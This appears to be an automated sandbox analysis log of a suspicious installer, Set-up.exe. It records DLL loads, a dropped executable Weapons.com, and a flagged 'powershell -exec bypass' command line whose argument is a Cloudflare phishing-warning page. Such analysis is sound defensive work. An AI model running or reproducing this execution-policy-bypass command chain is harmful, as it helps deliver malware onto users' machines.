      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comSection loaded: wsock32.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comSection loaded: version.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comSection loaded: winmm.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comSection loaded: mpr.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comSection loaded: napinsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comSection loaded: pnrpnsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comSection loaded: wshbth.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comSection loaded: nlaapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comSection loaded: winrnr.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comSection loaded: webio.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
      Source: Set-up.exeStatic file information: File size 73408260 > 1048576
      Source: Set-up.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

      Data Obfuscation

      barindex
      Suspicious powershell command line found
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass <!DOCTYPE html> <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--> <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--> <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--> <head> <title>Suspected phishing site | Cloudflare</title> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte IE 10]><!--> <script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> Warning</h4> <h2 style="margin: 16px 0;">Suspected Phishing</h2> <strong>This website has been reported for potential phishing.</strong> <p>Phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="MWmHbEVHkRq1iRHQGoe4vxMFc6dY0_vvbg29zZMFNNw-1734715075-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div> <
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass <!DOCTYPE html> <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--> <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--> <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--> <head> <title>Suspected phishing site | Cloudflare</title> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte IE 10]><!--> <script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> Warning</h4> <h2 style="margin: 16px 0;">Suspected Phishing</h2> <strong>This website has been reported for potential phishing.</strong> <p>Phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="MWmHbEVHkRq1iRHQGoe4vxMFc6dY0_vvbg29zZMFNNw-1734715075-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div> <Jump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00CA31D3 pushfd ; ret 15_2_00CA31E1

      Persistence and Installation Behavior

      barindex
      Drops PE files with a suspicious file extension
      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\405361\Weapons.comJump to dropped file
      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\405361\Weapons.comJump to dropped file
      Source: C:\Users\user\Desktop\Set-up.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
